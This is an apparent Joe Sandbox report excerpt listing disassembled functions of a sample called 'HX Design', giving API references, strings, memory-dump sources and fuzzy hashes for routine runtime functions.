Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction Fuzzy Hash: C351B3327083429AEB34AB21D088269B7A0FB55B84F985136DA5E47F85CFBCE458D718

Function 00007FF73206EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF73206EF37
_CallSETranslator.LIBVCRUNTIME ref: 00007FF73206EF83

Strings

RCC, xrefs: 00007FF73206EF53
MOC, xrefs: 00007FF73206EF4B

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction ID: 4d90f1188ff7a7f9464b9f797c1b8cba77273c5fc9dd3856ad185efe238e326c
Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction Fuzzy Hash: 0B61A432A08BC595E730AF15E4407AAF7A0FB94784F444225EB9D07B5ADFBCD194CB14

Function 00007FFDFB2E8417 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB2E84C8
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB2E854E

Strings

(join-%u), xrefs: 00007FFDFB2E8559
(subquery-%u), xrefs: 00007FFDFB2E8570

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: (join-%u)$(subquery-%u)
API String ID: 4225454184-2916047017
Opcode ID: e4b271abe33ea453b0af829f0d0b3c64b2499140cc847aae9644bee38be7c82c
Instruction ID: 31636edbde3572d713f652c6f55f7e33fb7240ca4879b73963154771ec9e332a
Opcode Fuzzy Hash: e4b271abe33ea453b0af829f0d0b3c64b2499140cc847aae9644bee38be7c82c
Instruction Fuzzy Hash: 5251E572B2A64385EB618B17D464F3C23A1FB04BA4F565635CABD8B2ECDF2CE4418750

Function 00007FFDFACE21E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFACE220A
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFACE2228

Strings

CJK UNIFIED IDEOGRAPH-, xrefs: 00007FFDFACE221E
HANGUL SYLLABLE , xrefs: 00007FFDFACE2200

Memory Dump Source

Source File: 00000001.00000002.2104253662.00007FFDFACE1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDFACE0000, based on PE: true

Associated: 00000001.00000002.2104206646.00007FFDFACE0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD2A000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD38000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD87000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD8C000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD8F000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104600723.00007FFDFAD90000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104654670.00007FFDFAD92000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdface0000_HX Design.jbxd

Similarity

API ID: 00007B6570
String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
API String ID: 4069847057-87138338
Opcode ID: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
Instruction ID: e6543a9fab7fa91bc3ccc371cfad4e0600b3cccf753d5e7c75571d06a693cfcc
Opcode Fuzzy Hash: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
Instruction Fuzzy Hash: B3412976B0C74286EB188F18E494A6D7751EB90BA0F444230EABD47ADDDF3CD9818B40

Function 00007FFDFB30FE60 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB30FF93

Strings

%!.15g, xrefs: 00007FFDFB30FFDC
-, xrefs: 00007FFDFB30FF77
, xrefs: 00007FFDFB30FFB2

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: $%!.15g$-
API String ID: 4225454184-875264902
Opcode ID: 312380605faac612b932c0e84749a71c5b5db630570bc0cb0ad3afdeeff4af52
Instruction ID: 0c876dde81ffb73600209b95a901bbe0799d1514e6a945b7585f9bdd85e811db
Opcode Fuzzy Hash: 312380605faac612b932c0e84749a71c5b5db630570bc0cb0ad3afdeeff4af52
Instruction Fuzzy Hash: BB412661F1D78683E710CB2EE060BAA7BA0EB557C8F044135EA9D477AACB3DD405C700

Function 00007FFE003119DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

00007FFDFADA4D31.LIBCRYPTO-3 ref: 00007FFE003521AB
00007FFDFADA4D31.LIBCRYPTO-3 ref: 00007FFE003521ED
00007FFDFADA4D31.LIBCRYPTO-3 ref: 00007FFE0035222F

Strings

..\s\ssl\tls_srp.c, xrefs: 00007FFE0035229E, 00007FFE003522B0

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\tls_srp.c
API String ID: 3568877910-1778748169
Opcode ID: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
Instruction ID: 82748414a263535547c6da66a8092e7ed25e6af8cd94abf5fb132a9345634254
Opcode Fuzzy Hash: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
Instruction Fuzzy Hash: 3F413025A1AB8380FA96EF6594507BE23A0AF42F85F194634DF5D4BBBDDF2CA5018310

Function 00007FFDFB2ED9E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB2EDA23
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB2EDA4C

Strings

winRead, xrefs: 00007FFDFB2EDAF7
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFDFB2EDB38

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 4225454184-1843600136
Opcode ID: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
Instruction ID: 65358db4f76c5d8b1878c54a31f1ea92fc8ff01d91803271e149bba13013eb39
Opcode Fuzzy Hash: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
Instruction Fuzzy Hash: 2B41E222B0964782E7209F16A950DA977A5FB94788F144036EE6D837FCDF3CE6468740

Function 00007FF732067E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF73206352C,?,00000000,00007FF732063F23), ref: 00007FF732067F32

Strings

%.*s, xrefs: 00007FF732067EEB
%s%c, xrefs: 00007FF732067EA4
\, xrefs: 00007FF732067E97

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
Instruction ID: cb5503d9ef1ce6fb035f8cc693bb8ebce0ff3813b2026f86c57c645c16a20f8e
Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
Instruction Fuzzy Hash: A1312821719AC165FA21AB20E8107AAA354EF84BE0F800231EE6D47BD9EF7CD649D714

Function 00007FF732062810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF7320628EA

Strings

ERROR, xrefs: 00007FF73206286F
[PYI-%d:%ls] , xrefs: 00007FF732062868
Error, xrefs: 00007FF7320628DD

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction ID: 18d21326473585813f69bcac6c3857d141485184f55478114089c1c0fb3aafce
Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction Fuzzy Hash: EF21F772B08B41A2E710AB14F8447EAB3A0FB88780F804136EE8D93756EF7CD649D750

Function 00007FF73207C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF73207C61F
WriteFile.KERNEL32 ref: 00007FF73207C8E7
WriteFile.KERNEL32 ref: 00007FF73207C92D
GetLastError.KERNEL32 ref: 00007FF73207C9E3

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction ID: d1f7a5cd22fe3baa11bd6ef399f1b89cb33fadc80c2f0bc43816602d35b28729
Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction Fuzzy Hash: 8DD14872B08A8099E750EF79C4442FCB7B1FB54798B804236DE5E97B99DE78D00AD310

Function 00007FF73207CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73207CF4B), ref: 00007FF73207D07C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73207CF4B), ref: 00007FF73207D107

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction ID: 9844f4bf710d9e253e86d0feab19913dfb1c066e20067fca83d4801b33b2f880
Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction Fuzzy Hash: 5D910832F08651B5F760FF69944027DABA0BB54B88F944139DE1E57A84CFBCD44AD720

Function 00007FFDFB32DB10 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB32DBF7
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB32DC4B
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB32DCA7
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB32DD27

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID:
API String ID: 4225454184-0
Opcode ID: 1485575833ac080eba873b396e4fec7d0adbbe42a312c587b8f7937f0ac7c60a
Instruction ID: 7f04e6a5fb2441c3384831f3a1ace78858abfadbfd27853c7b87c6440df29799
Opcode Fuzzy Hash: 1485575833ac080eba873b396e4fec7d0adbbe42a312c587b8f7937f0ac7c60a
Instruction Fuzzy Hash: 2291CF32B4AB538BEB65AF169560A6922D0FF44B90F585234EE7D0BBD9DE3CE4108710

Function 00007FFDFB3440F0 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB344165
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB344189
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB3441A8
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB3441C0

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID:
API String ID: 4225454184-0
Opcode ID: b93e7d24146e94e90c05e856a74659a5816adcbd1dcfc72995cc6fe0d7043182
Instruction ID: b981118d70afce2597e7c16db6fa486905853f9df9a4be0497d08599fb1c9db2
Opcode Fuzzy Hash: b93e7d24146e94e90c05e856a74659a5816adcbd1dcfc72995cc6fe0d7043182
Instruction Fuzzy Hash: 7E219162B1A74293E724AF16B5614BAA3A1FB457C0F045035DBDE47FAEDF2CE0518300

Function 00007FF7320620C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF7320620F4
SetWindowLongPtrW.USER32 ref: 00007FF732062116
GetWindowLongPtrW.USER32 ref: 00007FF732062140
InvalidateRect.USER32 ref: 00007FF732062160

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 82fb2f56c599b5cc0937f283f898b1152c69182c9412d4b5909f295937462b98
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 35110C21F0C14692F654A769E54527AD292EF98780FC45030DF4907B9ECDBDD4C9E214

Function 00007FF73206D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF73206D03C
GetCurrentThreadId.KERNEL32 ref: 00007FF73206D04A
GetCurrentProcessId.KERNEL32 ref: 00007FF73206D056
QueryPerformanceCounter.KERNEL32 ref: 00007FF73206D066

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction ID: 1da149ebf50e52701d1fc4aadaca410253ef4374f39da23dabcf6ae84371ee9d
Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction Fuzzy Hash: 9E114C22B14B059AEB009B60E8442B973A4FB59758F840E31DA2D867A4EFB8D1A8C350

Function 00007FFE0038ECE0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFE0038ED0C
GetCurrentThreadId.KERNEL32 ref: 00007FFE0038ED1A
GetCurrentProcessId.KERNEL32 ref: 00007FFE0038ED26
QueryPerformanceCounter.KERNEL32 ref: 00007FFE0038ED36

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
Instruction ID: 9003b689d50e2209181bed2cbd9a542abcc51ee9d5d33339ba42892b71b10eee
Opcode Fuzzy Hash: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
Instruction Fuzzy Hash: 46112A22B14F118AEB41CF60E8546B833A4FB5A758F440E31DB6D867A8EF7CD1988340

Function 00007FFDFACE2E0C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFDFACE2E38
GetCurrentThreadId.KERNEL32 ref: 00007FFDFACE2E46
GetCurrentProcessId.KERNEL32 ref: 00007FFDFACE2E52
QueryPerformanceCounter.KERNEL32 ref: 00007FFDFACE2E62

Memory Dump Source

Source File: 00000001.00000002.2104253662.00007FFDFACE1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDFACE0000, based on PE: true

Associated: 00000001.00000002.2104206646.00007FFDFACE0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD2A000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD38000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD87000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD8C000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD8F000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104600723.00007FFDFAD90000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104654670.00007FFDFAD92000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdface0000_HX Design.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
Instruction ID: 59c82e1098348a5a6f1f5ed75932734b4b90a5810f8c73d232f86714f468a51f
Opcode Fuzzy Hash: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
Instruction Fuzzy Hash: AE113C26B25F118AEB04CF60E8A47B833A4FB19758F440E31DA6D477A8EF7CD5988340

Function 00007FFDFB31DC84 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 290COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB31E011

Strings

out of memory, xrefs: 00007FFDFB322478
string or blob too big, xrefs: 00007FFDFB322103

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

